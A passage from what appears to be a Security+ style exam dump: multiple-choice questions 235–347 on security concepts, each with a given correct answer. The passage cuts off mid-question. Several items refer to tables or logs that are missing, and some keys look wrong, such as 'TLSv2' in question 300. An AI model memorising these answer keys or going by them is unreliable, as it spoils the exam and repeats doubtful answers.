A website developer is working on a new e-commerce website and has asked an information security expert for the most appropriate way to store
credit card numbers to create an easy reordering process. Which of the following methods would BEST accomplish this goal?
A. Salting the magnetic strip information
B. Encrypting the credit card information in transit
C. Hashing the credit card numbers upon entry
D. Tokenizing the credit cards in the database
Correct Answer: D

Question #235
Which of the following supplies non-repudiation during a forensics investigation?
A. Dumping volatile memory contents first
B. Duplicating a drive with dd
C. Using a SHA-2 signature of a drive image
D. Logging everyone in contact with evidence
E. Encrypting sensitive data
Correct Answer: C

Question #236
A security analyst is tasked with classifying data to be stored on company servers. Which of the following should be classified as proprietary?
A. Customers’ dates of birth
B. Customers’ email addresses
C. Marketing strategies
D. Employee salaries
Correct Answer: C

Question #237
Which of the following holds staff accountable while escorting unauthorized personnel?
A. Locks
B. Badges
C. Cameras
D. Visitor logs
Correct Answer: D

Question #238
An organization’s Chief Security Officer (CSO) wants to validate the business’s involvement in the incident response plan to ensure its validity and
thoroughness. Which of the following will the CSO MOST likely use?
A. An external security assessment
B. A bug bounty program
C. A tabletop exercise
D. A red-team engagement
Correct Answer: C

Question #239
Which of the following documents provides guidance regarding the recommended deployment of network security systems from the
manufacturer?
A. Cloud control matrix
B. Reference architecture
C. NIST RMF
D. CIS Top 20
Correct Answer: B

Question #240
During a recent security assessment, a vulnerability was found in a common OS. The OS vendor was unaware of the issue and promised to release
a patch within the next quarter. Which of the following BEST describes this type of vulnerability?
A. Legacy operating system
B. Weak configuration
C. Zero day
D. Supply chain
Correct Answer: C

Question #241
Which of the following is a targeted attack aimed at compromising users within a specific industry or group?
A. Watering hole
B. Typosquatting
C. Hoax
D. Impersonation
Correct Answer: A

Question #242
To reduce and limit software and infrastructure costs, the Chief Information Officer has requested to move email services to the cloud. The cloud
provider and the organization must have security controls to protect sensitive data. Which of the following cloud services would BEST
accommodate the request?
A. IaaS
B. PaaS
C. DaaS
D. SaaS
Correct Answer: D

Question #243
A security engineer is concerned that the strategy for detection on endpoints is too heavily dependent on previously defined attacks. The engineer
would like a tool to monitor for changes to key files and network traffic on the device. Which of the following tools BEST addresses both detection
and prevention?
A. NIDS
B. HIPS
C. AV
D. NGFW
Correct Answer: B

Question #244
During a recent incident, an external attacker was able to exploit an SMB vulnerability over the internet. Which of the following action items should
a security analyst perform FIRST to prevent this from occurring again?
A. Check for any recent SMB CVEs.
B. Install AV on the affected server.
C. Block unneeded TCP 445 connections.
D. Deploy a NIDS in the affected subnet.
Correct Answer: C

Question #245
A penetration tester is fuzzing an application to identify where the EIP of the stack is located on memory. Which of the following attacks is the
penetration tester planning to execute?
A. Race-condition
B. Pass-the-hash
C. Buffer overflow
D. XSS
Correct Answer: C

Question #246
Server administrators want to configure a cloud solution so that computing memory and processor usage is maximized most efficiently across a
number of virtual servers. They also need to avoid potential denial-of-service situations caused by availability. Which of the following should
administrators configure to maximize system availability while efficiently utilizing available computing power?
A. Dynamic resource allocation
B. High availability
C. Segmentation
D. Container security
Correct Answer: A

Question #247
While reviewing the wireless router, a systems administrator of a small business determines someone is spoofing the MAC address of an
authorized device. Given the table below:
Which of the following should be the administrator’s NEXT step to detect if there is a rogue system without impacting availability?
A. Conduct a ping sweep,
B. Physically check each system.
C. Deny internet access to the "UNKNOWN" hostname.
D. Apply MAC filtering.
Correct Answer: A

Question #248
A security analyst in a SOC has been tasked with onboarding a new network into the SIEM. Which of the following BEST describes the information
that should feed into a SIEM solution in order to adequately support an investigation?
A. Logs from each device type and security layer to provide correlation of events
B. Only firewall logs since that is where attackers will most likely try to breach the network
C. Email and web-browsing logs because user behavior is often the cause of security breaches
D. NetFlow because it is much more reliable to analyze than syslog and will be exportable from every device
Correct Answer: A

Question #249
An organization just implemented a new security system. Local laws state that citizens must be notified prior to encountering the detection
mechanism to deter malicious activities. Which of the following is being implemented?
A. Proximity cards with guards
B. Fence with electricity
C. Drones with alarms
D. Motion sensors with signage
Correct Answer: D

Question #250
An IT security manager requests a report on company information that is publicly available. The manager's concern is that malicious actors will be
able to access the data without engaging in active reconnaissance. Which of the following is the MOST efficient approach to perform the
analysis?
A. Provide a domain parameter to theHarvester tool.
B. Check public DNS entries using dnsenum.
C. Perform a Nessus vulnerability scan targeting a public company’s IP
.
D. Execute nmap using the options: scan all ports and sneaky mode.
Correct Answer: A

Question #251
Which of the following environments utilizes dummy data and is MOST likely to be installed locally on a system that allows code to be assessed
directly and modified easily with each build?
A. Production
B. Test
C. Staging
D. Development
Correct Answer: D

Question #252
An analyst receives multiple alerts for beaconing activity for a host on the network. After analyzing the activity, the analyst observes the following
activity:
* A user enters comptia.org into a web browser.
* The website that appears is not the comptia.org site.
* The website is a malicious site from the attacker.
* Users in a different office are not having this issue.
Which of the following types of attacks was observed?
A. On-path attack
B. DNS poisoning
C. Locator (URL) redirection
D. Domain hijacking
Correct Answer: B

Question #253
Which of the following in the incident response process is the BEST approach to improve the speed of the identification phase?
A. Activate verbose logging in all critical assets.
B. Tune monitoring in order to reduce false positive rates.
C. Redirect all events to multiple syslog servers.
D. Increase the number of sensors present on the environment.
Correct Answer: B

Question #254
A security administrator is analyzing the corporate wireless network. The network only has two access points running on channels 1 and 11. While
using airodump-ng, the administrator notices other access points are running with the same corporate ESSID on all available channels and with
the same BSSID of one of the legitimate access points. Which of the following attacks is happening on the corporate network?
A. On-path
B. Evil twin
C. Jamming
D. Rogue access point
E. Disassociation
Correct Answer: B

Question #255
When implementing automation with IoT devices, which of the following should be considered FIRST to keep the network secure?
A. Z-Wave compatibility
B. Network range
C. Zigbee configuration
D. Communication protocols
Correct Answer: D

Question #256
An organization is concerned that its hosted web servers are not running the most updated version of the software. Which of the following would
work BEST to help identify potential vulnerabilities?
A. hping3 -S comptia-org -p 80
B. nc -l -v comptia.org -p 80
C. nmap comptia.org -p 80 -sV
D. nslookup –port=80 comptia.org
Correct Answer: C

Question #257
A news article states hackers have been selling access to IoT camera feeds. Which of the following is the MOST likely reason for this issue?
A. Outdated software
B. Weak credentials
C. Lack of encryption
D. Backdoors
Correct Answer: B

Question #258
A company wants to build a new website to sell products online. The website will host a storefront application that will allow visitors to add
products to a shopping cart and pay for the products using a credit card. Which of the following protocols would be the MOST secure to
implement?
A. SSL
B. SFTP
C. SNMP
D. TLS
Correct Answer: D

Question #259
An IT manager is estimating the mobile device budget for the upcoming year. Over the last five years, the number of devices that were replaced
due to loss, damage, or theft steadily increased by 10%. Which of the following would BEST describe the estimated number of devices to be
replaced next year?
A. ALE
B. ARO
C. RPO
D. SLE
Correct Answer: B

Question #260
An organization is repairing the damage after an incident. Which of the following controls is being implemented?
A. Detective
B. Preventive
C. Corrective
D. Compensating
Correct Answer: C

Question #261
A Chief Executive Officer’s (CEO) personal information was stolen in a social-engineering attack. Which of the following sources would reveal if
the CEO’s personal information is for sale?
A. Automated information sharing
B. Open-source intelligence
C. The dark web
D. Vulnerability databases
Correct Answer: C

Question #262
Which of the following typically uses a combination of human and artificial intelligence to analyze event data and take action without intervention?
A. TTP
B. OSINT
C. SOAR
D. SIEM
Correct Answer: C

Question #263
A security analyst has been tasked with creating a new WiFi network for the company. The requirements received by the analyst are as follows:
* Must be able to differentiate between users connected to WiFi
* The encryption keys need to change routinely without interrupting the users or forcing reauthentication
* Must be able to integrate with RADIUS
* Must not have any open SSIDs
Which of the following options BEST accommodates these requirements?
A. WPA2-Enterprise
B. WPA3-PSK
C. 802.11n
D. WPS
Correct Answer: A

Question #264
A security administrator is trying to determine whether a server is vulnerable to a range of attacks. After using a tool, the administrator obtains the
following output:
Which of the following attacks was successfully implemented based on the output?
A. Memory leak
B. Race conditions
C. SQL injection
D. Directory traversal
Correct Answer: D

Question #265
A Chief Security Officer is looking for a solution that can reduce the occurrence of customers receiving errors from back-end infrastructure when
systems go offline unexpectedly. The security architect would like the solution to help maintain session persistence. Which of the following would
BEST meet the requirements?
A. Reverse proxy
B. NIC teaming
C. Load balancer
D. Forward proxy
Correct Answer: C

Question #266
Which of the following should an organization consider implementing in the event executives need to speak to the media after a publicized data
breach?
A. Incident response plan
B. Business continuity plan
C. Communication plan
D. Disaster recovery plan
Correct Answer: C

Question #267
A well-known organization has been experiencing attacks from APTs. The organization is concerned that custom malware is being created and
emailed into the company or installed on USB sticks that are dropped in parking lots. Which of the following is the BEST defense against this
scenario?
A. Configuring signature-based antivirus to update every 30 minutes
B. Enforcing S/MIME for email and automatically encrypting USB drives upon insertion
C. Implementing application execution in a sandbox for unknown software
D. Fuzzing new files for vulnerabilities if they are not digitally signed
Correct Answer: C

Question #268
A company is implementing BYOD and wants to ensure all users have access to the same cloud-based services. Which of the following would
BEST allow the company to meet this requirement?
A. IaaS
B. PaaS
C. MaaS
D. SaaS
Correct Answer: D

Question #269
During a recent security incident at a multinational corporation a security analyst found the following logs for an account called user:
Which of the following account policies would BEST prevent attackers from logging in as user?
A. Impossible travel time
B. Geofencing
C. Time-based logins
D. Geolocation
Correct Answer: A

Question #270
An organization is tuning SIEM rules based off of threat intelligence reports. Which of the following phases of the incident response process does
this scenario represent?
A. Lessons learned
B. Eradication
C. Recovery
D. Preparation
Correct Answer: D

Question #271
The database administration team is requesting guidance for a secure solution that will ensure confidentiality of cardholder data at rest only in
certain fields in the database schema. The requirement is to substitute a sensitive data field with a non-sensitive field that is rendered useless if a
data breach occurs. Which of the following is the BEST solution to meet the requirement?
A. Tokenization
B. Masking
C. Full disk encryption
D. Mirroring
Correct Answer: A

Question #272
A company’s security team received notice of a critical vulnerability affecting a high-profile device within the web infrastructure. The vendor patch
was just made available online but has not yet been regression tested in development environments. In the interim, firewall rules were
implemented to reduce the access to the interface affected by the vulnerability. Which of the following controls does this scenario describe?
A. Deterrent
B. Compensating
C. Detective
D. Preventive
Correct Answer: B

Question #273
A security analyst is reviewing the following command-line output:
Which of the following is the analyst observing?
A. ICMP spoofing
B. URL redirection
C. MAC address cloning
D. DNS poisoning
Correct Answer: C

Question #274
A company was recently breached, Part of the company’s new cybersecurity strategy is to centralize the logs from all security devices. Which of
the following components forwards the logs to a central source?
A. Log enrichment
B. Log aggregation
C. Log parser
D. Log collector
Correct Answer: D

Question #275
Which of the following is the MOST likely reason for securing an air-gapped laboratory HVAC system?
A. To avoid data leakage
B. To protect surveillance logs
C. To ensure availability
D. To facilitate third-party access
Correct Answer: C

Question #276
A user forwarded a suspicious email to the security team. Upon investigation, a malicious URL was discovered. Which of the following should be
done FIRST to prevent other users from accessing the malicious URL?
A. Configure the web content filter for the web address.
B. Report the website to threat intelligence partners.
C. Set the SIEM to alert for any activity to the web address.
D. Send out a corporate communication to warn all users of the malicious email.
Correct Answer: A

Question #277
A systems analyst is responsible for generating a new digital forensics chain-of-custody form. Which of the following should the analyst include in
this documentation? (Choose two.)
A. The order of volatility
B. A CRC32 checksum
C. The provenance of the artifacts
D. The vendor’s name
E. The date and time
F. A warning banner
Correct Answer: CE

Question #278
An organization is migrating several SaaS applications that support SSO. The security manager wants to ensure the migration is completed
securely. Which of the following application integration aspects should the organization consider before focusing into underlying implementation
details? (Choose two.)
A. The back-end directory source
B. The identity federation protocol
C. The hashing method
D. The encryption method
E. The registration authority
F. The certificate authority
Correct Answer: BF

Question #279
A security analyst has been tasked with finding the maximum amount of data loss that can occur before ongoing business operations would be
impacted. Which of the following terms BEST defines this metric?
A. MTTR
B. RTO
C. RPO
D. MTBF
Correct Answer: C

Question #280
The IT department's on-site developer has been with the team for many years. Each time an application is released, the security team is able to
identify multiple vulnerabilities. Which of the following would BEST help the team ensure the application is ready to be released to production?
A. Limit the use of third-party libraries.
B. Prevent data exposure queries.
C. Obfuscate the source code.
D. Submit the application to QA before releasing it.
Correct Answer: D

Question #281
During a security incident investigation, an analyst consults the company’s SIEM and sees an event concerning high traffic to a known, malicious
command-and-control server. The analyst would like to determine the number of company workstations that may be impacted by this issue. Which
of the following can provide this information?
A. WAF logs
B. DNS logs
C. System logs
D. Application logs
Correct Answer: B

Question #282
A company has a flat network that is deployed in the cloud. Security policy states that all production and development servers must be
segmented. Which of the following should be used to design the network to meet the security requirements?
A. CASB
B. VPC
C. Perimeter network
D. WAF
Correct Answer: B

Question #283
A new plug-and-play storage device was installed on a PC in the corporate environment. Which of the following safeguards will BEST help to
protect the PC from malicious files on the storage device?
A. Change the default settings on the PC.
B. Define the PC firewall rules to limit access.
C. Encrypt the disk on the storage device.
D. Plug the storage device in to the UPS.
Correct Answer: A

Question #284
A company is adopting a BYOD policy and is looking for a comprehensive solution to protect company information on user devices. Which of the
following solutions would BEST support the policy?
A. Mobile device management
B. Full-device encryption
C. Remote wipe
D. Biometrics
Correct Answer: A

Question #285
A company wants to modify its current backup strategy to minimize the number of backups that would need to be restored in case of data loss.
Which of the following would be the BEST backup strategy to implement?
A. Incremental backups followed by differential backups
B. Full backups followed by incremental backups
C. Delta backups followed by differential backups
D. Incremental backups followed by delta backups
E. Full backups followed by differential backups
Correct Answer: E

Question #286
The compliance team requires an annual recertification of privileged and non-privileged user access. However, multiple users who left the
company six months ago still have access. Which of the following would have prevented this compliance violation?
A. Account audits
B. AUP
C. Password reuse
D. SSO
Correct Answer: A

Question #287
A company recently experienced a data breach and the source was determined to be an executive who was charging a phone in a public area.
Which of the following would MOST likely have prevented this breach?
A. A firewall
B. A device pin
C. A USB data blocker
D. Biometrics
Correct Answer: C

Question #288
The manager who is responsible for a data set has asked a security engineer to apply encryption to the data on a hard disk. The security engineer
is an example of a __________.
A. data controller.
B. data owner.
C. data custodian.
D. data processor.
Correct Answer: C

Question #289
An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following
would be the MOST acceptable?
A. SED
B. HSM
C. DLP
D. TPM
Correct Answer: A

Question #290
After segmenting the network, the network manager wants to control the traffic between the segments. Which of the following should the
manager use to control the network traffic?
A. A DMZ
B. A VPN
C. A VLAN
D. An ACL
Correct Answer: D

Question #291
Which of the following BEST describes when an organization utilizes a ready-to-use application from a cloud provider?
A. IaaS
B. SaaS
C. PaaS
D. XaaS
Correct Answer: B

Question #292
Which of the following BEST helps to demonstrate integrity during a forensic investigation?
A. Event logs
B. Encryption
C. Hashing
D. Snapshots
Correct Answer: C

Question #293
Which of the following would be MOST effective to contain a rapidly spreading attack that is affecting a large number of organizations?
A. Machine learning
B. DNS sinkhole
C. Blocklist
D. Honeypot
Correct Answer: B

Question #294
A network administrator has been alerted that web pages are experiencing long load times. After determining it is not a routing or DNS issue, the
administrator logs in to the router, runs a command, and receives the following output:
CPU 0 percent busy, from 300 sec ago
1 sec ave: 99 percent busy
5 sec ave: 97 percent busy
1 min ave: 83 percent busy
Which of the following is the router experiencing?
A. DDoS attack
B. Memory leak
C. Buffer overflow
D. Resource exhaustion
Correct Answer: D

Question #295
The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business
hours, including during a pandemic or crisis. However, the CEO is concerned that some staff members may take advantage of the flexibility and
work from high-risk countries while on holiday or outsource work to a third-party organization in another country. The Chief Information Officer
(CIO) believes the company can implement some basic controls to mitigate the majority of the risk. Which of the following would be BEST to
mitigate the CEO's concerns? (Choose two.)
A. Geolocation
B. Time-of-day restrictions
C. Certificates
D. Tokens
E. Geotagging
F. Role-based access controls
Correct Answer: AB

Question #296
While checking logs, a security engineer notices a number of end users suddenly downloading files with the .tar.gz extension. Closer examination
of the files reveals they are PE32 files. The end users state they did not initiate any of the downloads. Further investigation reveals the end users
all clicked on an external email containing an infected MHT file with an href link a week prior. Which of the following is MOST likely occurring?
A. A RAT was installed and is transferring additional exploit tools.
B. The workstations are beaconing to a command-and-control server.
C. A logic bomb was executed and is responsible for the data transfers.
D. A fileless virus is spreading in the local network environment
Correct Answer: A

Question #297
A business is looking for a cloud service provider that offers a la carte services, including cloud backups, VM elasticity, and secure networking.
Which of the following cloud service provider types should the business engage?
A. IaaS
B. PaaS
C. XaaS
D. SaaS
Correct Answer: C

Question #298
A research company discovered that an unauthorized piece of software has been detected on a small number of machines in its lab. The
researchers collaborate with other machines using port 445 and on the Internet using port 443. The unauthorized software is starting to be seen
on additional machines outside of the lab and is making outbound communications using HTTPS and SMB. The security team has been instructed
to resolve the problem as quickly as possible while causing minimal disruption to the researchers. Which of the following contains the BEST
course of action in this scenario?
A. Update the host firewalls to block outbound SMB.
B. Place the machines with the unapproved software in containment.
C. Place the unauthorized application in a blocklist.
D. Implement a content filter to block the unauthorized software communication.
Correct Answer: C

Question #299
A security analyst has been reading about a newly discovered cyberattack from a known threat actor. Which of the following would BEST support
the analyst's review of the tactics, techniques, and protocols the threat actor was observed using in previous campaigns?
A. Security research publications
B. The MITRE ATT&CK framework
C. The Diamond Model of Intrusion Analysis
D. The Cyber Kill Chain
Correct Answer: B

Question #300
A security analyst is hardening a network infrastructure. The analyst is given the following requirements:
• Preserve the use of public IP addresses assigned to equipment on the core router.
• Enable "in transport" encryption protection to the web server with the strongest ciphers.
Which of the following should the analyst implement to meet these requirements? (Choose two.)
A. Configure VLANs on the core router.
B. Configure NAT on the core router.
C. Configure BGP on the core router.
D. Enable AES encryption on the web server.
E. Enable 3DES encryption on the web server.
F. Enable TLSv2 encryption on the web server.
Correct Answer: BF

Question #301
A security analyst is investigating an incident to determine what an attacker was able to do on a compromised laptop. The analyst reviews the
following SIEM log:
Which of the following describes the method that was used to compromise the laptop?
A. An attacker was able to move laterally from PC1 to PC2 using a pass-the-hash attack.
B. An attacker was able to bypass application whitelisting by emailing a spreadsheet attachment with an embedded PowerShell in the file.
C. An attacker was able to install malware to the C:\asdf234 folder and use it to gain administrator rights and launch Outlook.
D. An attacker was able to phish user credentials successfully from an Outlook user profile
Correct Answer: B

Question #302
A security analyst discovers that a company's username and password database was posted on an Internet forum. The usernames and passwords
are stored in plain text. Which of the following would mitigate the damage done by this type of data exfiltration in the future?
A. Create DLP controls that prevent documents from leaving the network.
B. Implement salting and hashing.
C. Configure the web content filter to block access to the forum.
D. Increase password complexity requirements.
Correct Answer: B

Question #303
Joe, an employee, receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and
date of birth be provided to confirm Joe’s identity before sending him the prize. Which of the following BEST describes this type of email?
A. Spear phishing
B. Whaling
C. Phishing
D. Vishing
Correct Answer: C

Question #304
A company deployed a WiFi access point in a public area and wants to harden the configuration to make it more secure. After performing an
assessment, an analyst identifies that the access point is configured to use WPA3, AES, WPS, and RADIUS. Which of the following should the
analyst disable to enhance the access point security?
A. WPA3
B. AES
C. RADIUS
D. WPS
Correct Answer: D

Question #305
Which of the following would be used to find the MOST common web-application vulnerabilities?
A. OWASP
B. MITRE ATT&CK
C. Cyber Kill Chain
D. SDLC
Correct Answer: A

Question #306
A network engineer is troubleshooting wireless network connectivity issues that were reported by users. The issues are occurring only in the
section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are
unable to connect to network drives. The issues appear to increase when laptop users return to their desks after using their devices in other areas
of the building. There have also been reports of users being required to enter their credentials on web pages in order to gain access to them.
Which of the following is the MOST likely cause of this issue?
A. An external access point is engaging in an evil-twin attack.
B. The signal on the WAP needs to be increased in that section of the building.
C. The certificates have expired on the devices and need to be reinstalled.
D. The users in that section of the building are on a VLAN that is being blocked by the firewall
Correct Answer: A

Question #307
A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator
MOST likely use to confirm the suspicions?
A. Nmap
B. Wireshark
C. Autopsy
D. DNSEnum
Correct Answer: A

Question #308
A vulnerability has been discovered and a known patch to address the vulnerability does not exist. Which of the following controls works BEST
until a proper fix is released?
A. Detective
B. Compensating
C. Deterrent
D. Corrective
Correct Answer: B

Question #309
While reviewing pcap data, a network security analyst is able to locate plaintext usernames and passwords being sent from workstations to
network switches. Which of the following is the security analyst MOST likely observing?
A. SNMP traps
B. A Telnet session
C. An SSH connection
D. SFTP traffic
Correct Answer: B

Question #310
An attacker replaces a digitally signed document with another version that goes unnoticed. Upon reviewing the document’s contents, the author
notices some additional verbiage that was not originally in the document but cannot validate an integrity issue. Which of the following attacks
was used?
A. Cryptomalware
B. Hash substitution
C. Collision
D. Phishing
Correct Answer: C

Question #311
A security analyst notices that specific files are being deleted each time a systems administrator is on vacation. Which of the following BEST
describes the type of malware that is running?
A. Fileless virus
B. Logic bomb
C. Keylogger
D. Ransomware
Correct Answer: B

Question #312
Which of the following involves the inclusion of code in the main codebase as soon as it is written?
A. Continuous monitoring
B. Continuous deployment
C. Continuous validation
D. Continuous integration
Correct Answer: D

Question #313
Which of the following can reduce vulnerabilities by avoiding code reuse?
A. Memory management
B. Stored procedures
C. Normalization
D. Code obfuscation
Correct Answer: D

Question #314
The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building. Which of the
following should be closely coordinated between the technology, cybersecurity, and physical security departments? Select 1
A. Authentication protocol
B. Encryption type
C. WAP placement
D. VPN configuration
Correct Answer: C

Question #315
Which of the following is an example of risk avoidance?
A. Installing security updates directly in production to expedite vulnerability fixes
B. Buying insurance to prepare for financial loss associated with exploits
C. Not installing new software to prevent compatibility errors
D. Not taking preventive measures to stop the theft of equipment
Correct Answer: C

Question #316
A security administrator needs to block a TCP connection using the corporate firewall. Because this connection is potentially a threat, the
administrator does not want to send back an RST. Which of the following actions in the firewall rule would work BEST?
A. Drop
B. Reject
C. Log alert
D. Permit
Correct Answer: A

Question #317
A security team discovered a large number of company-issued devices with non-work-related software installed. Which of the following policies
would MOST likely contain language that would prohibit this activity?
A. NDA
B. BPA
C. AUP
D. SLA
Correct Answer: C

Question #318
Which of the following BEST describes data streams that are compiled through artificial intelligence that provides insight on current
cyberintrusions, phishing, and other malicious cyberactivity?
A. Intelligence fusion
B. Review reports
C. Log reviews
D. Threat feeds
Correct Answer: D

Question #319
Which of the following would be the BEST resource for a software developer who is looking to improve secure coding practices for web
applications?
A. OWASP
B. Vulnerability scan results
C. NIST CSF
D. Third-party libraries
Correct Answer: A

Question #320
Ann, a customer, received a notification from her mortgage company stating her PII may be shared with partners, affiliates, and associates to
maintain day-to-day business operations. Which of the following documents did Ann receive?
A. An annual privacy notice
B. A non-disclosure agreement
C. A privileged-user agreement
D. A memorandum of understanding
Correct Answer: A

Question #321
A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new ERP system for the company. The CISO
categorizes the system, selects the controls that apply to the system, implements the controls, and then assesses the success of the controls
before authorizing the system. Which of the following is the CISO using to evaluate the environment for this new ERP system?
A. The Diamond Model of Intrusion Analysis
B. CIS Critical Security Controls
C. NIST Risk Management Framework
D. ISO 27002
Correct Answer: C

Question #322
A manufacturing company has several one-off legacy information systems that cannot be migrated to a newer OS due to software compatibility
issues. The OSs are still supported by the vendor, but the industrial software is no longer supported. The Chief Information Security Officer has
created a resiliency plan for these systems that will allow OS patches to be installed in a non-production environment, while also creating backups
of the systems for recovery. Which of the following resiliency techniques will provide these capabilities?
A. Redundancy
B. RAID 1+5
C. Virtual machines
D. Full backups
Correct Answer: C

Question #323
A retail store has a business requirement to deploy a kiosk computer in an open area. The kiosk computer’s operating system has been hardened
and tested. A security engineer is concerned that someone could use removable media to install a rootkit. Which of the following should the
security engineer configure to BEST protect the kiosk computer?
A. Measured boot
B. Boot attestation
C. UEFI
D. EDR
Correct Answer: A

Question #324
A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly.
Which of the following technologies should the IT manager use when implementing MFA?
A. One-time passwords
B. Email tokens
C. Push notifications
D. Hardware authentication
Correct Answer: C

Question #325
A security engineer is reviewing the logs from a SAML application that is configured to use MFA. During this review, the engineer notices a high
volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed
without a VPN, has a policy that allows time-based tokens to be generated. Users who change locations should be required to reauthenticate but
have been able to log in without doing so. Which of the following statements BEST explains the issue?
A. OpenID is mandatory to make the MFA requirements work.
B. An incorrect browser has been detected by the SAML application.
C. The access device has a trusted certificate installed that is overwriting the session token.
D. The user’s IP address is changing between logins, but the application is not invalidating the token.
Correct Answer: D

Question #326
An organization wants to enable built-in FDE on all laptops. Which of the following should the organization ensure is installed on all laptops?
A. TPM
B. CA
C. SAML
D. CRL
Correct Answer: A

Question #327
A security analyst needs to centrally manage credentials and permissions to the company’s network devices. The following security requirements
must be met:
• All actions performed by the network staff must be logged.
• Per-command permissions must be possible.
• The authentication server and the devices must communicate through TCP
.
Which of the following authentication protocols should the analyst choose?
A. Kerberos
B. CHAP
C. TACACS+
D. RADIUS
Correct Answer: C

Question #328
An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the
first night, the security team alerted the developers that more than 2,000 findings were reported and need to be addressed. Which of the following
is the MOST likely cause for the high number of findings?
A. The vulnerability scanner was not properly configured and generated a high number of false positives.
B. Third-party libraries have been loaded into the repository and should be removed from the codebase.
C. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue.
D. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.
Correct Answer: A

Question #329
An organization is concerned about intellectual property theft by employees who leave the organization. Which of the following should the
organization MOST likely implement?
A. CBT
B. NDA
C. MOU
D. AUP
Correct Answer: B

Question #330
A security analyst reviews web server logs and notices the following lines:
Which of the following vulnerabilities is the attacker trying to exploit?
A. Token reuse
B. SQLi
C. CSRF
D. XSS
Correct Answer: D

Question #331
A network manager is concerned that business may be negatively impacted if the firewall in its data center goes offline. The manager would like to
implement a high availability pair to:
A. decrease the mean time between failures.
B. remove the single point of failure.
C. cut down the mean time to repair.
D. reduce the recovery time objective.
Correct Answer: B

Question #332
A major manufacturing company updated its internal infrastructure and just recently started to allow OAuth applications to access corporate data.
Data leakage is now being reported. Which of the following MOST likely caused the issue?
A. Privilege creep
B. Unmodified default settings
C. TLS protocol vulnerabilities
D. Improper patch management
Correct Answer: B

Question #333
While preparing a software inventory report, a security analyst discovers an unauthorized program installed on most of the company’s servers. The
program utilizes the same code signing certificate as an application deployed to only the accounting team. After removing the unauthorized
program, which of the following mitigations should the analyst implement to BEST secure the server environment?
A. Revoke the code signing certificate used by both programs.
B. Block all unapproved file hashes from installation
C. Add the accounting application file hash to the allowed list.
D. Update the code signing certificate for the approved application.
Correct Answer: A

Question #334
A security analyst is reviewing the latest vulnerability scan report for a web server following an incident. The vulnerability report showed no
concerning findings. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available
for the vulnerability. Which of the following is the MOST likely cause?
A. Security patches failed to install due to a version incompatibility.
B. An adversary altered the vulnerability scan reports.
C. A zero-day vulnerability was used to exploit the web server.
D. The scan reported a false negative for the vulnerability.
Correct Answer: D

Question #335
The help desk has received calls from users in multiple locations who are unable to access core network services. The network team has
identified and turned off the network switches using remote commands. Which of the following actions should the network team take NEXT?
A. Disconnect all external network connections from the firewall.
B. Send response teams to the network switch locations to perform updates.
C. Turn on all the network switches by using the centralized management software.
D. Initiate the organization's incident response plan.
Correct Answer: D

Question #336
An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims. Which of the following is
the attacker MOST likely attempting?
A. A spear-phishing attack
B. A watering-hole attack
C. Typo squatting
D. A phishing attack
Correct Answer: B

Question #337
An organization is moving away from the use of client-side and server-side certificates for EAP
. The company would like for the new EAP solution
to have the ability to detect rogue access points. Which of the following would accomplish these requirements?
A. PEAP
B. EAP-FAST
C. EAP-TLS
D. EAP-TTLS
Correct Answer: B

Question #338
A security analyst receives a SIEM alert that someone logged in to the appadmin test account, which is only used for the early detection of
attacks. The security analyst then reviews the following application log:
Which of the following can the security analyst conclude?
A. A replay attack is being conducted against the application.
B. An injection attack is being conducted against a user authentication system.
C. A service account password may have been changed, resulting in continuous failed logins within the application.
D. A credentialed vulnerability scanner attack is testing several CVEs against the application.
Correct Answer: B

Question #339
A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release. Which of the
following documents would the third-party vendor MOST likely be required to review and sign?
A. SLA
B. NDA
C. MOU
D. AUP
Correct Answer: B

Question #340
Which of the following is an administrative control that would be MOST effective to reduce the occurrence of malware execution?
A. Security awareness training
B. Frequency of NIDS updates
C. Change control procedures
D. EDR reporting cycle
Correct Answer: A

Question #341
Employees at a company are receiving unsolicited text messages on their corporate cell phones. The unsolicited text messages contain a
password reset link. Which of the following attacks is being used to target the company?
A. Phishing
B. Vishing
C. Smishing
D. Spam
Correct Answer: C

Question #342
During a Chief Information Security Officer (CISO) convention to discuss security awareness, the attendees are provided with a network
connection to use as a resource. As the convention progresses, one of the attendees starts to notice delays in the connection, and the HTTPS site
requests are reverting to HTTP
. Which of the following BEST describes what is happening?
A. Birthday collision on the certificate key
B. DNS hijacking to reroute traffic
C. Brute force to the access point
D. A SSL/TLS downgrade
Correct Answer: D

Question #343
A user enters a password to log in to a workstation and is then prompted to enter an authentication code. Which of the following MFA factors or
attributes are being utilized in the authentication process? (Choose two.)
A. Something you know
B. Something you have
C. Somewhere you are
D. Someone you know
E. Something you are
F. Something you can do
Correct Answer: AB

Question #344
A company uses specially configured workstations for any work that requires administrator privileges to its Tier 0 and Tier 1 systems. The
company follows a strict process to harden systems immediately upon delivery. Even with these strict security measures in place, an incident
occurred from one of the workstations. The root cause appears to be that the SoC was tampered with or replaced. Which of the following MOST
likely occurred?
A. Fileless malware
B. A downgrade attack
C. A supply-chain attack
D. A logic bomb
E. Misconfigured BIOS
Correct Answer: C

Question #345
Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security
engineer has been on vacation for a few days. Which of the following attacks can the account lockout be attributed to?
A. Backdoor
B. Brute-force
C. Rootkit
D. Trojan
Correct Answer: B

Question #346
A security analyst is reviewing the output of a web server log and notices a particular account is attempting to transfer large amounts of money:
Which of the following types of attacks is MOST likely being conducted?
A. SQLi
B. CSRF
C. Spear phishing
D. API
Correct Answer: B

Question #347
After installing a patch on a security appliance, an organization realized a massive data exfiltration had occurred. Which of the following BEST
describes the incident?
A. Supply chain attack
B. Ransomware attack
